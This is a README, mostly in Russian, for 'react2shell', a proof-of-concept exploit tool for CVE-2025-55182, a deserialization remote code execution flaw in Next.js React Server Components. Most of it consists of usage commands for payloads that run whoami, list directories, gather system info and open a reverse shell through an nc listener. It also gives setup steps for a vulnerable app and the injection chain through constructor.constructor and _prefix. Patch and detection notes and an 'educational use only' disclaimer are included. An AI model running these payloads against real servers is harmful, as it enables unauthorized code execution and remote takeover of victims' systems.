
Полный фреймворк для эксплуатации уязвимости CVE-2025-55182
Доказательство концепции эксплойта для CVE-2025-55182 — критической уязвимости удалённого выполнения кода в приложениях Next.js, использующих React Server Components.
ЭТОТ ИНСТРУМЕНТ ПРЕДНАЗНАЧЕН ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНОГО И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ.
# Clone or download this repository
git clone https://github.com/zr0n/react2shell
cd react2shell
# Install dependencies
npm install form-data
node react2shell.js <target_url> <payload_type> [options]
| Payload | Description | Example |
|---|---|---|
basic | Математическое подтверждение концепции (7*7+1=50) | node react2shell.js http://target:3000 basic |
whoami | Показать текущего пользователя системы | node react2shell.js http://target:3000 whoami |
dir | Вывести содержимое текущего каталога | node react2shell.js http://target:3000 dir |
systeminfo | Показать информацию об операционной системе | node react2shell.js http://target:3000 systeminfo |
file | Создать доказательный файл EXPLOITED.txt | node react2shell.js http://target:3000 file |
calc | Запустить калькулятор (визуальное доказательство для Windows) | node react2shell.js http://target:3000 calc |
notepad | Запустить блокнот (визуальное доказательство для Windows) | node react2shell.js http://target:3000 notepad |
shell | Обратная оболочка (автоопределение Windows/Linux) | node react2shell.js http://target:3000 shell 10.10.10.5 4444 |
node react2shell.js http://localhost:3000 basic
# Check server console for output: EXPLOITED: 50
# Get current user
node react2shell.js http://localhost:3000 whoami
# List files
node react2shell.js http://localhost:3000 dir
# System information
node react2shell.js http://localhost:3000 systeminfo
# Launch calculator
node react2shell.js http://localhost:3000 calc
# Launch notepad
node react2shell.js http://localhost:3000 notepad
node react2shell.js http://localhost:3000 file
# Check server directory for EXPLOITED.txt
# Terminal 1: Start listener
nc -lvnp 4444
# Terminal 2: Execute exploit
node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
# Works on both Windows (PowerShell) and Linux (Bash)
# Create project directory
mkdir vulnerable-nextjs-app
cd vulnerable-nextjs-app
# Initialize Next.js with vulnerable version
npx create-next-app@latest . --ts --app --no-eslint --tailwind
# Downgrade to vulnerable version
npm install [email protected]
# Install dependencies
npm install
app/page.tsx)export default function Home() {
return (
<div className="p-8">
<h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
<p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
</div>
);
}
npm run dev
# Server runs on http://localhost:3000
Эксплойт использует уязвимость десериализации в React Server Components:
constructor.constructor для доступа к конструктору Function_prefix// Simplified vulnerability chain
{
_formData: {
get: '$3:constructor:constructor' // Access Function constructor
},
_prefix: 'YOUR_CODE_HERE//' // Injected code
}
Немедленно обновитесь:
npm update next@latest
npm update react@latest react-dom@latest
Проверьте исправленные версии:
npm list next react
Требуемые версии:
next-actionИщите POST-запросы с:
next-actionmultipart/form-dataconstructor, _prefix, _formDataPOST / with next-action header
Suspicious FormData keys: 0, 1, 2, 3, 4
Response: 200 (successful exploitation) or 500 (failed)
Это образовательный инструмент. Приветствуется вклад, улучшающий:
НЕ отправляйте материалы, усиливающие возможности атак.
Только для образовательного использования — гарантии не предоставляются
Luiz Fernando Ziron Создано в образовательных целях и для повышения осведомлённости в области кибербезопасности.
Используя этот инструмент, вы соглашаетесь:
Несанкционированный доступ к компьютерным системам является преступлением в большинстве юрисдикций.
Оставайтесь в безопасности, действуйте этично и законно. 🔒